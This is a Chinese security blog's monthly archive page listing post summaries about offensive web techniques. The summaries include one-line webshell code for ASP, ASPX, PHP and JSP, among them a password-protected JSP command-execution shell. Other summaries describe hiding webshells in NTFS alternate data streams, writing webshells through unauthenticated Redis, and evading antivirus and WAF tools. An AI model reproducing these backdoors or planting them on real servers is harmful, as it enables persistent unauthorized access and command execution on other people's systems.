09 2017 档案

摘要:0X01 前言 未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。 0X02 利用ADS隐藏webshell 关于ADS的介绍,就不再阐述,详见尾部参考资料。 PHP 一句话木马:<?php @ev 阅读全文
posted @ 2017-09-29 14:50 Bypass 阅读(2801) 评论(0) 推荐(0) 编辑
摘要:0x01 环境搭建 启动redis服务进程后,就可以使用测试客户端程序redis-cli和redis服务交互了。 比如: 0x02 未授权访问漏洞测试 使用redis客户端直接无账号成功登录redis: 从登录的结果可以看出该redis服务对公网开放,且未启用认证。 利用redis写webshell 阅读全文
posted @ 2017-09-21 13:59 Bypass 阅读(8140) 评论(0) 推荐(1) 编辑
摘要:JSP一句话收集: 1、带密码的回显cmd马 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")) 阅读全文
posted @ 2017-09-21 10:23 Bypass 阅读(52618) 评论(1) 推荐(3) 编辑
摘要:aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Reque 阅读全文
posted @ 2017-09-21 09:18 Bypass 阅读(26187) 评论(0) 推荐(0) 编辑
摘要:ASP一句话木马收集: <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Req 阅读全文
posted @ 2017-09-20 13:08 Bypass 阅读(47328) 评论(0) 推荐(0) 编辑
摘要:珍藏版: 一个简单的过D盾的免杀php 过狗过D盾 参考链接:https://www.t00ls.net/thread-49715-1-1.html 阅读全文
posted @ 2017-09-20 09:35 Bypass 阅读(985) 评论(0) 推荐(0) 编辑
摘要:代码审计精华文章收录: 关于php的一些'特性'或漏洞 https://github.com/80vul/phpcodz 【干货分享】PHP漏洞挖掘——进阶篇 http://blog.nsfocus.net/php-vulnerability-mining/ 常见高危漏洞及验证方法 http://b 阅读全文
posted @ 2017-09-19 19:51 Bypass 阅读(521) 评论(0) 推荐(0) 编辑
摘要:0X01 前言 D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+( 阅读全文
posted @ 2017-09-14 10:59 Bypass 阅读(8703) 评论(1) 推荐(0) 编辑

点击右上角即可分享
微信分享提示